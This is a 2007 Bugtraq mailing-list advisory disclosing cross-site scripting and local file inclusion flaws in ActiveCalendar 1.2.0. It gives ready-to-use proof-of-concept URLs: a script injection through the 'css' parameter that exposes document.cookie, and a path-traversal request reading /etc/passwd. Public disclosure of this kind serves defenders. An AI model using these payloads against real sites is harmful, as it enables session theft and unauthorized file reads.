| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | ActiveCalendar 1.2.0, Multiple vulnerabilities |
| From: | simon.itsecurity@gmail.com |
| Date: | 24 Feb 2007 02:34:54 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
ActiveCalendar 1.2.0, Multiple vulnerabilities Vendor site : http://www.micronetwork.de/activecalendar/ Global risk : Critical Multiples XSS : --------------- /activecalendar/data/[page].php?css="><script>alert(document.cookie)</script> In : /data/ flatevents.php js.php mysqlevents.php m_2.php m_3.php m_4.php xmlevents.php y_2.php y_3.php Local File Include : --------------------- /activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00 Regards, Simon Bonnard - 24/02/07 - 02:40am |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final, krasza |
|---|---|
| Next by Date: | Photostand_1.2.0 Multiple Cross Site Scripting, simon . itsecurity |
| Previous by Thread: | Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final, krasza |
| Next by Thread: | Re: ActiveCalendar 1.2.0, Multiple vulnerabilities, simon . itsecurity |
| Indexes: | [Date] [Thread] [Top] [All Lists] |